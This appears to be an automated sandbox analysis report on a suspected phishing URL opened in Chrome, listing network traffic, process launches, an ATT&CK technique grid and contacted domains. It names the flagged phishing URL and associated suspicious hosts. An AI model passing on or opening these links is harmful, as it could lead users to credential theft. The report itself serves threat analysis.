    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 14:08:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OM5yjJ0VJtZ2suzhIvxM%2F09Rw4GnD7Q5seM8cH049LfQrpILNNjhBJxm9MkQnU17BE%2FHjCHTRfW%2FHj3r07nJpyoL3vFJSnEUcOvUceb3hhVahUXZqAw%2BWJDDDo77ZemLMlZgp4K4el0PgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6a0f1ea82c6c08-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1266&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1232&delivery_rate=2116959&cwnd=251&unsent_bytes=0&cid=cc480cce3820975f&ts=404&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 14:08:24 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: JIxmdYlblECfFceUtlo7416LGWTmRn7Tx3I=$owI91Ya7tJtZrAX6cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d6a0f2809966c38-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 14:08:26 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: WQtxeiz/tPsdpW/6vWiiSNLfxwEB3ATeCUM=$tCu+PZbsHEDc5rJGServer: cloudflareCF-RAY: 8d6a0f35bda33177-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 14:08:27 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: F+CaYjboDBC/QFE5/EpfnqDdx9mdvHj1jhY=$GJIJXGBFFxY9Fxchcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d6a0f3a6ef56b41-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 14:08:29 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: ZgevGx5pRXqTXWJ1xVZQVc9ikPO6sYF5hGA=$qwkkaRjapK9Ga6alcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d6a0f48fcdde589-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 14:08:32 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: gXJh9Me7KkItrOuJpVCmKg4Rz9BQoHH8whM=$UupRKa6ir+sGWk5jServer: cloudflareCF-RAY: 8d6a0f5d3d0f6c80-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 14:08:39 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 18Connection: closecf-cdnjs-via: cfworkerCF-Cache-Status: MISSExpires: Tue, 22 Oct 2024 18:08:39 GMTCache-Control: public, max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HHi8xveK8X3zmjMMsaI56NaBRpVCFoAEI9CfpJtWHkJs%2FZ3%2Fhj3qYWd5bZ43HQqp1itDOxLLbyV2vXma0KU%2BZ3rKc0yO7GDIXr21tncTbAQDlZoC3YLubCZFuGgHqWul4GHFUHsb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=15780000Server: cloudflareCF-RAY: 8d6a0f863bdf6b05-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 14:08:45 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94LAg2WpngPxh8V8opwdSyAa7XvKNFcqbdikRbaDDi6yq7cOnk8nOLZDwSZp4tei%2B31zGJIcUzuPQsLLPbRr%2FS%2F0tl6XmahvtkHxsCyT5F%2FVyECHWIcWgBUqP0P5ei2ovb2%2BT5S6Sbe1jA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6a0fa899732cba-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=995&delivery_rate=1851662&cwnd=242&unsent_bytes=0&cid=bdc0e5ed543fef5b&ts=11847&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 14:08:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
    Source: chromecache_104.1.dr, chromecache_115.1.dr, chromecache_98.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
    Source: chromecache_121.1.dr, chromecache_106.1.drString found in binary or memory: https://getbootstrap.com)
    Source: chromecache_92.1.dr, chromecache_97.1.drString found in binary or memory: https://getbootstrap.com/)
    Source: chromecache_121.1.dr, chromecache_92.1.dr, chromecache_106.1.dr, chromecache_97.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
    Source: chromecache_121.1.dr, chromecache_92.1.dr, chromecache_106.1.dr, chromecache_97.1.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49799 version: TLS 1.2
    Source: classification engineClassification label: mal68.phis.win@25/64@56/21
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1952,i,1099532071707917260,5294793716901066126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://apeidieppe-d.basiic.net/yKKWd"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1952,i,1099532071707917260,5294793716901066126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    3
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js0%URL Reputationsafe
    https://code.jquery.com/jquery-3.2.1.slim.min.js0%URL Reputationsafe
    https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js0%URL Reputationsafe
    https://getbootstrap.com/)0%URL Reputationsafe
    https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js0%URL Reputationsafe
    http://opensource.org/licenses/MIT).0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    stackpath.bootstrapcdn.com
    104.18.11.207
    truefalse
      unknown
      5102487645.my.id
      162.241.71.126
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          unknown
          s-part-0044.t-0009.fb-t-msedge.net
          13.107.253.72
          truefalse
            unknown
            ger.file.myqcloud.com
            162.62.150.176
            truefalse
              unknown
              code.jquery.com
              151.101.2.137
              truefalse
                unknown
                apeidieppe-d.basiic.net
                188.114.97.3
                truetrue
                  unknown
                  cdnjs.cloudflare.com
                  104.17.24.14
                  truefalse
                    unknown
                    challenges.cloudflare.com
                    104.18.94.41
                    truefalse
                      unknown
                      maxcdn.bootstrapcdn.com
                      104.18.11.207
                      truefalse
                        unknown
                        sni1gl.wpc.omegacdn.net
                        152.199.21.175
                        truefalse
                          unknown
                          www.google.com
                          172.217.16.196
                          truefalse
                            unknown
